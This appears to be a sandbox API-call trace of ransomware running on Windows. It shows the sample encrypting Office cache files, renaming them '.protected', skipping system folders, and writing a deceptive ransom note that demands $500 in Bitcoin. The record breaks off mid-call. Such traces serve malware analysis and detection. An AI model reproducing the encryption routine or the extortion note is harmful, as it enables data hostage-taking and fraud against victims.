CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0052.787] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0052.787] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0052.787] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0052.787] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0052.787] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0052.787] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0052.787] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x106f, lpOverlapped=0x0) returned 1 [0052.794] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffef91, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.794] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x106f, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x106f, lpOverlapped=0x0) returned 1 [0052.794] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0052.794] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0052.794] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0052.794] CloseHandle (hObject=0xb4) returned 1 [0052.795] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0052.795] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0052.796] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0052.796] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0052.796] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0052.796] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0052.796] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0052.796] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0052.797] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0052.797] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0052.797] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0052.797] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0052.797] CloseHandle (hObject=0xa4) returned 1 [0052.797] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0052.797] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0052.798] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0052.798] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0052.798] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0052.798] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0052.798] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C") returned 66 [0052.798] lstrcmpW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0052.798] lstrcmpW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0052.798] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*") returned 68 [0052.798] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0052.799] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0052.799] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0052.799] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0052.799] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0052.799] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0052.799] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\.") returned 68 [0052.799] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0052.799] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0052.799] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0052.799] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0052.799] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0052.799] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0052.799] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0052.799] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0052.799] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0052.799] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0052.799] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0052.799] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0052.799] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\..") returned 69 [0052.799] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0052.800] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0052.800] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0052.800] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0052.800] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0052.800] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0052.800] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0052.800] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0052.800] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0052.800] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0052.800] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0052.800] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0052.800] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0052.800] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0052.800] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0052.800] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0052.800] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0052.800] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0052.800] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0052.801] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0052.801] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0052.801] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0052.801] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0052.801] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0052.801] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0052.801] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x978, lpOverlapped=0x0) returned 1 [0052.822] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff688, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.822] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x978, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x978, lpOverlapped=0x0) returned 1 [0052.823] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0052.823] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0052.823] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0052.823] CloseHandle (hObject=0xb4) returned 1 [0052.824] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0052.824] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0052.833] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0052.833] lstrcmpiW (lpString1="WordLR.cab", lpString2="Windows") returned 1 [0052.833] lstrcmpiW (lpString1="WordLR.cab", lpString2="Program Files") returned 1 [0052.833] lstrcmpiW (lpString1="WordLR.cab", lpString2="Program Files (x86)") returned 1 [0052.833] lstrcmpiW (lpString1="WordLR.cab", lpString2="$Recycle.bin") returned 1 [0052.833] lstrcmpiW (lpString1="WordLR.cab", lpString2="System Volume Information") returned 1 [0052.833] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 77 [0052.833] StrStrIW (lpFirst="WordLR.cab", lpSrch=".protected") returned 0x0 [0052.833] lstrcmpW (lpString1="WordLR.cab", lpString2="RESTORE_FILES.txt") returned 1 [0052.833] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0052.833] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0052.833] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0052.833] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 77 [0052.833] StrStrW (lpFirst="WordLR.cab", lpSrch=".txt") returned 0x0 [0052.833] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 77 [0052.833] StrStrW (lpFirst="WordLR.cab", lpSrch=".rar") returned 0x0 [0052.833] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 77 [0052.833] StrStrW (lpFirst="WordLR.cab", lpSrch=".zip") returned 0x0 [0052.833] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0052.850] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.850] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0052.850] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0052.850] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0052.852] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0052.852] CloseHandle (hObject=0xb4) returned 1 [0053.282] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.protected") returned 87 [0053.282] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.protected")) returned 1 [0053.283] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0053.283] lstrcmpiW (lpString1="WordMUI.msi", lpString2="Windows") returned 1 [0053.283] lstrcmpiW (lpString1="WordMUI.msi", lpString2="Program Files") returned 1 [0053.283] lstrcmpiW (lpString1="WordMUI.msi", lpString2="Program Files (x86)") returned 1 [0053.283] lstrcmpiW (lpString1="WordMUI.msi", lpString2="$Recycle.bin") returned 1 [0053.283] lstrcmpiW (lpString1="WordMUI.msi", lpString2="System Volume Information") returned 1 [0053.283] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 78 [0053.283] StrStrIW (lpFirst="WordMUI.msi", lpSrch=".protected") returned 0x0 [0053.283] lstrcmpW (lpString1="WordMUI.msi", lpString2="RESTORE_FILES.txt") returned 1 [0053.283] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0053.283] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0053.283] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0053.283] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 78 [0053.283] StrStrW (lpFirst="WordMUI.msi", lpSrch=".txt") returned 0x0 [0053.283] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 78 [0053.283] StrStrW (lpFirst="WordMUI.msi", lpSrch=".rar") returned 0x0 [0053.283] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 78 [0053.284] StrStrW (lpFirst="WordMUI.msi", lpSrch=".zip") returned 0x0 [0053.284] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0053.603] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.604] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0053.604] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0053.604] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0053.832] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0053.832] CloseHandle (hObject=0xb4) returned 1 [0053.956] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.protected") returned 88 [0053.956] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.protected")) returned 1 [0053.957] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0053.957] lstrcmpiW (lpString1="WordMUI.xml", lpString2="Windows") returned 1 [0053.957] lstrcmpiW (lpString1="WordMUI.xml", lpString2="Program Files") returned 1 [0053.957] lstrcmpiW (lpString1="WordMUI.xml", lpString2="Program Files (x86)") returned 1 [0053.957] lstrcmpiW (lpString1="WordMUI.xml", lpString2="$Recycle.bin") returned 1 [0053.957] lstrcmpiW (lpString1="WordMUI.xml", lpString2="System Volume Information") returned 1 [0053.957] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0053.957] StrStrIW (lpFirst="WordMUI.xml", lpSrch=".protected") returned 0x0 [0053.957] lstrcmpW (lpString1="WordMUI.xml", lpString2="RESTORE_FILES.txt") returned 1 [0053.957] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0053.957] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0053.957] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all 